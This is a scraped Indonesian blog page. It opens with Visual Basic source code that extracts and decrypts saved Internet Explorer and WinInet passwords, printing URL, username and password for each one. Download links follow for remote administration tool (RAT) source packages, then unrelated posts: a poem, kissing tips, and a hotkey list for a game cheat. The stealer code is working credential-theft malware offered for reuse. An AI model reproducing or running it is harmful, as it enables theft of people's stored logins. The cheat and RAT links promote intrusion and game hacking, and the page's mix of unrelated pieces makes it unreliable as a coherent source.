Private Const SYNCHRONIZE As Long = &H100000
Private Const KEY_ENUMERATE_SUB_KEYS As Long = &H8
Private Const KEY_QUERY_VALUE As Long = &H1
Private Const KEY_NOTIFY As Long = &H10
Private Const KEY_READ As Long = ((READ_CONTROL Or KEY_QUERY_VALUE Or KEY_ENUMERATE_SUB_KEYS Or KEY_NOTIFY) And (Not SYNCHRONIZE))
Private Const ERROR_SUCCESS As Long = 0&
Private Const PROV_RSA_FULL As Long = 1&
Private Const ALG_CLASS_HASH As Long = (4 * 2 ^ 13)
Private Const ALG_TYPE_ANY As Long = 0
Private Const ALG_SID_SHA As Long = 4
Private Const CALG_SHA As Long = (ALG_CLASS_HASH Or ALG_TYPE_ANY Or ALG_SID_SHA)
Private Const HP_HASHVAL As Long = &H2
Private hKey As Long
Private m_Data As String
Private m_Storage() As String
Private i As Integer
Public Function GetIE() As String
On Local Error Resume Next

Dim x As Integer
Dim strOut() As String, strSplit() As String, strHash() As String

m_Data = vbNullString: Erase m_Storage: hKey = 0

Call GetStorage2
Call GetCredentials

If Len(m_Data) = 0 Then Exit Function
strOut = Split(m_Data, vbFormFeed)

ReDim Preserve m_Storage(0 To UBound(strOut) - 1)
For i = 0 To UBound(strOut) - 1
strSplit = Split(strOut(i), vbVerticalTab)

For x = 0 To UBound(m_Storage)
If m_Storage(x) = strSplit(3) And m_Storage(x) <> "n/a" Then GoTo skipMsg
Next x

GetIE = GetIE & "URL: " & strSplit(0) & vbCrLf & "Username: " & strSplit(1) & vbCrLf & "Password: " & strSplit(2) & vbCrLf & "Hash: " & strSplit(3) & vbCrLf & vbCrLf
skipMsg:
m_Storage(i) = strSplit(3)
Next i
End Function
Private Sub GetCredentials()
Dim tmp As String, sRes As String, sURL As String, tAuth() As String
Dim ptrData As Long, dwNumCreds As Long, lpCredentials As Long
Dim bufData(36) As Integer, x As Integer
Dim m_Cred As CREDENTIAL, dataIn As DATA_BLOB, dataOut As DATA_BLOB, dataEntry As DATA_BLOB

Call CredEnumerate(StrPtr("Microsoft_WinInet_*"), 0, dwNumCreds, lpCredentials)
If dwNumCreds Then
For i = 0 To dwNumCreds - 1
CopyBytes 4&, ByVal VarPtr(ptrData), ByVal lpCredentials + (i) * 4: CopyBytes LenB(m_Cred), ByVal VarPtr(m_Cred), ByVal ptrData
sRes = CopyString(m_Cred.lpstrTargetName): dataEntry.cbData = 74
For x = 0 To 36: bufData(x) = CInt(Asc(Mid("abe2869f-9b47-4cd9-a358-c22904dba7f7" & vbNullChar, x + 1, 1)) * 4): Next

dataEntry.pbData = VarPtr(bufData(0)): dataIn.pbData = m_Cred.lpbCredentialBlob: dataIn.cbData = m_Cred.dwCredentialBlobSize: dataOut.cbData = 0: dataOut.pbData = 0
Call CryptUnprotectData(dataIn, ByVal 0&, ByVal VarPtr(dataEntry), ByVal 0&, ByVal 0&, 0, dataOut)

tmp = Space(dataOut.cbData \ 2 - 1)
CopyBytes dataOut.cbData, ByVal StrPtr(tmp), ByVal dataOut.pbData
tAuth = Split(tmp, ":"): x = InStr(Mid$(sRes, 19), "/")

If x > 0 Then
sURL = Mid$(sRes, 19, x - 1)
Else
sURL = Mid$(sRes, 19)
End If

m_Data = m_Data & sURL & vbVerticalTab & tAuth(0) & vbVerticalTab & tAuth(1) & vbVerticalTab & "n/a" & vbFormFeed
Next
End If
End Sub
Private Sub GetStorage2()
Dim tmp As String, sRet As String, sHash As String
Dim m_Cache As Long, dwSize As Long, cbData As Long
Dim x As Integer, z As Integer
Dim bufData() As Byte

Dim m_URL As INTERNET_CACHE_ENTRY_INFO
If RegOpenKeyEx(HKEY_CURRENT_USER, IE_KEY, 0&, KEY_READ, hKey) <> ERROR_SUCCESS Then Exit Sub

Do
sRet = Space(4096)
If RegEnumValue(hKey, z, sRet, 4096, 0, ByVal 0&, ByVal 0&, ByVal 0&) <> 0 Then Exit Do
sRet = StripTerminator(sRet)

m_Cache = FindFirstUrlCacheEntry(vbNullString, ByVal 0&, dwSize)
If dwSize Then
ReDim bufData(dwSize - 1): CopyBytes 4&, bufData(0), dwSize
m_Cache = FindFirstUrlCacheEntry(vbNullString, bufData(0), dwSize)
Else
Exit Sub
End If

Do
CopyBytes LenB(m_URL), m_URL, bufData(0)
If (m_URL.CacheEntryType And (NORMAL_CACHE_ENTRY Or URLHISTORY_CACHE_ENTRY)) = (NORMAL_CACHE_ENTRY Or URLHISTORY_CACHE_ENTRY) Then
tmp = Trim(GetStrFromPtrA(m_URL.lpszSourceUrlName))

x = InStr(tmp, "file://")
If x Then GoTo Nxt
x = InStr(tmp, "@")
If x Then tmp = Mid(tmp, x + 1)
x = InStr(tmp, "?")
If x Then tmp = Left(tmp, x - 1)
tmp = LCase(tmp)

sHash = GetSHA1Hash(StrPtr(tmp), (Len(tmp) + 1) * 2)
If sHash = sRet Then
RegQueryValueEx hKey, sHash, 0&, 3, ByVal 0&, cbData
If cbData Then Call DecryptData(tmp, sHash, cbData)
Else
tmp = tmp & "/"
sHash = GetSHA1Hash(StrPtr(tmp), (Len(tmp) + 1) * 2)
If sHash = sRet Then
RegQueryValueEx hKey, sHash, 0&, 3, ByVal 0&, cbData
If cbData Then Call DecryptData(tmp, sHash, cbData)
End If
End If
End If

Nxt:
dwSize = 0: Call FindNextUrlCacheEntry(m_Cache, ByVal 0&, dwSize)
If dwSize Then
ReDim bufData(dwSize - 1)
CopyBytes 4&, bufData(0), dwSize
End If

Loop While FindNextUrlCacheEntry(m_Cache, bufData(0), dwSize)

z = z + 1
Loop
End Sub
Private Sub DecryptData(sURL As String, sHash As String, ByVal cbData As Long)
Dim sUsername As String, sPassword As String
Dim ptrData As Long, ptrEntry As Long

Dim hIndex As StringIndexHeader, eIndex As StringIndexEntry
Dim dataIn As DATA_BLOB, dataOut As DATA_BLOB, dataEntry As DATA_BLOB

Dim bufData() As Byte

ReDim bufData(cbData - 1)
Call RegQueryValueEx(hKey, sHash, 0&, 3, bufData(0), cbData)
dataIn.cbData = cbData: dataIn.pbData = VarPtr(bufData(0))
dataEntry.cbData = (Len(sURL) + 1) * 2: dataEntry.pbData = StrPtr(sURL)
Call CryptUnprotectData(dataIn, 0&, ByVal VarPtr(dataEntry), 0&, 0&, 0&, dataOut)

ReDim bufData(dataOut.cbData - 1)
CopyBytes dataOut.cbData, bufData(0), ByVal dataOut.pbData

CopyBytes Len(hIndex), hIndex, bufData(bufData(0))

If hIndex.dwType = 1 Then
If hIndex.dwEntriesCount >= 2 Then
ptrEntry = VarPtr(bufData(bufData(0))) + hIndex.dwStructSize

ptrData = ptrEntry + hIndex.dwEntriesCount * Len(eIndex)
If ptrData = 0 Or ptrEntry = 0 Then Exit Sub

For i = 1 To hIndex.dwEntriesCount / 2
If i <> 1 Then ptrEntry = ptrEntry + Len(eIndex)

CopyBytes Len(eIndex), eIndex, ByVal ptrEntry
sUsername = Space(eIndex.dwDataSize)
If lstrlenA(ptrData + eIndex.dwDataOffset) <> eIndex.dwDataSize Then
CopyBytes eIndex.dwDataSize * 2, ByVal StrPtr(sUsername), ByVal ptrData + eIndex.dwDataOffset
Else
CopyBytes eIndex.dwDataSize, ByVal sUsername, ByVal ptrData + eIndex.dwDataOffset
End If
ptrEntry = ptrEntry + Len(eIndex)
CopyBytes Len(eIndex), eIndex, ByVal ptrEntry
sPassword = Space(eIndex.dwDataSize)
If lstrlenA(ptrData + eIndex.dwDataOffset) <> eIndex.dwDataSize Then
Call CopyBytes(eIndex.dwDataSize * 2, ByVal StrPtr(sPassword), ByVal ptrData + eIndex.dwDataOffset)
Else
Call CopyBytes(eIndex.dwDataSize, ByVal sPassword, ByVal ptrData + eIndex.dwDataOffset)
End If

m_Data = m_Data & sURL & vbVerticalTab & sUsername & vbVerticalTab & sPassword & vbVerticalTab & sHash & "/" & i & vbFormFeed
Next i

End If
End If
End Sub
Private Function GetSHA1Hash(ByVal pbData As Long, ByVal dwDataLen As Long) As String
Dim hProv As Long, hHash As Long
Dim bufData(20) As Byte

Call CryptAcquireContext(hProv, 0&, vbNullString, PROV_RSA_FULL, 0&)
Call CryptCreateHash(hProv, CALG_SHA, 0&, 0&, hHash)
Call CryptHashData(hHash, pbData, dwDataLen, 0&)
Call CryptGetHashParam(hHash, HP_HASHVAL, ByVal VarPtr(bufData(0)), 20, 0)
Call CryptDestroyHash(hHash)
Call CryptReleaseContext(hProv, 0&)

For i = 0 To 19: GetSHA1Hash = GetSHA1Hash & Right("00" & Hex$(bufData(i)), 2): Next

GetSHA1Hash = GetSHA1Hash & Right("00" & Hex$(CheckSum(GetSHA1Hash)), 2)
End Function
Private Function CheckSum(s As String) As Byte
Dim sum As Long

For i = 1 To Len(s) Step 2: sum = sum + Val("&H" & Mid(s, i, 2)): Next
CheckSum = CByte(sum Mod 256)
End Function
Private Function StripTerminator(s As String) As String
Dim z As Integer

z = InStr(1, s, vbNullChar)
If z > 0 Then
StripTerminator = Left$(s, z - 1)
Else
StripTerminator = s
End If
End Function
Private Function CopyString(ByVal ptr As Long) As String
If ptr Then
CopyString = StrConv(SysAllocString(ptr), vbFromUnicode)
Else
CopyString = vbNullString
End If
End Function
Private Function GetStrFromPtrA(ByVal lpszA As Long) As String
GetStrFromPtrA = String$(lstrlenA(ByVal lpszA), 0)
Call lstrcpyA(ByVal GetStrFromPtrA, ByVal lpszA)
End Function

SECT - RAT/PC Remoter

Code:
http://www.ziddu.com/download/10707016/Sect.zip.html

Bio Nuke - Remote administration Tool

Code:
http://www.ziddu.com/download/10760718/BioNukERATSource.zip.html

Source code Remote administration Tool, Bio Nuke

Der Spaeher - Remote Administration Tool


Code:
http://www.ziddu.com/download/10706795/derSphear.zip.html

Der Spaeher - Remote Administration Tool

Penjualan dan Sistem Inventori Cafe

Code:
http://www.ziddu.com/download/8995584/Sales-InventorySystem.zip.html

Bagi anda yang ingin membuat program penjualan dan sistem inventori khusus Cafe / Rumah Makan. source code ini bisa dijadikan bahan dasar pembelajaran.


udahan ya..!!

capek gua..!!

semoga bermanfaat ya kak......

Semua karena Waktu

By ricky x sometime | At 08.19 | Label : | 0 Comments
Sesuatu dimana kita mencoba untuk menetapkannya sebagai apa?
Sejarah yang menginspirasi dunia
Atau hanya debu yang tertiup dan menghilang dalam kefanaan?

Ini semua tentang waktu
Sesuatu yang kita coba manfaatkan sebagai apa?
Memaksimalkan diri menggegam dunia
Mengejar kebahagiaan nirwana
Menjalani keduanya
atau
Terbuang dari sisi dunia dan nirwana

Ini semua adalah waktu
Sesuatu yang kita coba untuk mengenangnya sebagai apa?
Sebagai gulali yang manisnya merasuk dalam hidup
Sebagai kopi tanpa gula yang pahitnya terekam dalam indera perasa
atau mungkin
Sebagai kombinasi dari semua konfigurasi rasa yang dipadukan

Ini semua cerita waktu
Sesuatu yang mungkin saja menarik kita pada peran apa?
Peran sebagai seorang anak kecil yang terpuaskan ego bermainnya
Peran sebagai remaja yang senang menyalakkan egonya
Peran sebagai dewasa yang mencoba mematangkan egonya
atau mungkin
Peran sebagai tua yang bijaksana ketika sakaratul akan menjemput

Ini waktu
Kita tahu waktu itu berjalan dan detik itu berjalan cepat
Tapi jawaban isinya ya hanya kita dan Sang Khalik yang tahu
Yah waktu, hanyalah waktu….

Salam Inspirasi

4 Tips Mengenal Pasangan Dari Cara Menciumnya.

By ricky x sometime | At 08.13 | Label : | 0 Comments
Kissing atau berciuman dengan pasangan merupakan hal yang sangat menyenangkan dan dapat membuat Anda dan dia menjadi semakin dekat secara emosional. Namun tahukan Anda bahwa Anda bisa membaca karakter pria pasangan Anda, dari cara menciumnya. Berikut ini adalah Tips Cerdik Membaca Sifat Pasangan Anda dari Cara Menciumnya:
1. Mata Si Dia. Jika Kedua bola matanya tetap terbuka saat mencium Anda, maka seluruh pikirannya benar-benar ada bersama Anda. Pria lebih suka menikmati momen tersebut secara fisik, lewat pemandangan indah di hadapanya.
2. Sudut Ciuman. Bila si dia senang mencium Anda dengan memiringkan kepalanya (supaya Anda tak ikut repot), ini pertanda ia adalah probadi yang kompromis. Sementara pria yang gemar berciuman dengan posisi tubuh dan kepala tetap tegak lurus adalah orang yang mencintai spontanitas dan sangat suka jadi pusat perhatian.
3. Gerakan Lidah. Si dia mencium Anda dengan lidah yang lincah, menari-nari dan mult terbuka lebar? Artinya ia penuh gairah. Tapi jika gerakan lidahnya terlalu liar, bisa jadi si diamau menang sendiri. Kalau ia malah tak senang menggunakan lidahnya? Ia belum siap untuk serius.
4. Teknik. Si Dia setia dengan tekniknya dan tak mau menyesuaikan dengan keinginan Anda? Mungkin ia kurang luwes beradaptasi. Sebaliknya, pria yang memikirkan kebutuhan Anda adalah tipe komunikator yang baik.

cheat hack title 24 oktober 2010 rebaru

By ricky x sometime | At 23.25 | Label : | 0 Comments

Black Mamen@X1

Posted Image


-Hotkey : F12

Master Medal :
Numpad 1~0
mision card P : Numpad 1
mision card O : Numpad 2
mision card I : Numpad 3
mision card N : Numpad 4
mision card T : Numpad 5
mision card B : Numpad 6
mision card L : Numpad 7
mision card A : Numpad 8
mision card N : Numpad 9
mision card K : Numpad 0

MISION COMPLITE...

----------------------------------------------------------------------
Hack Map :
-Hotkey F1 : Mini Indonesia
-Hotkey F2 : [JaMu] Down
-Hotkey F3 : Downtwon
-Hotkey F4 : Luxville
-HotkeY F5 : Traning Camp
----------------------------------------------------------------------
Weapom Hack :
-Hotkey F6 : Hack Weapon RPG-07
-Hotkey F7 : Hack All weapon (Hack Weapon)
-Hotkey F9 : Hack Sniper SSG-69
-Hotkey F10 : Hack Weapon Shotgun 870MCS
◄ Posting Baru Posting Lama ►
 

tourist n stats

W3 Directory - the World Wide Web Directory My Ping in TotalPing.com
Google PageRank Checker Powered by  MyPagerank.Net

guest room

Copyright © 2012. CYBER MANADO - All Rights Reserved B-Seo Versi 3 by Bamz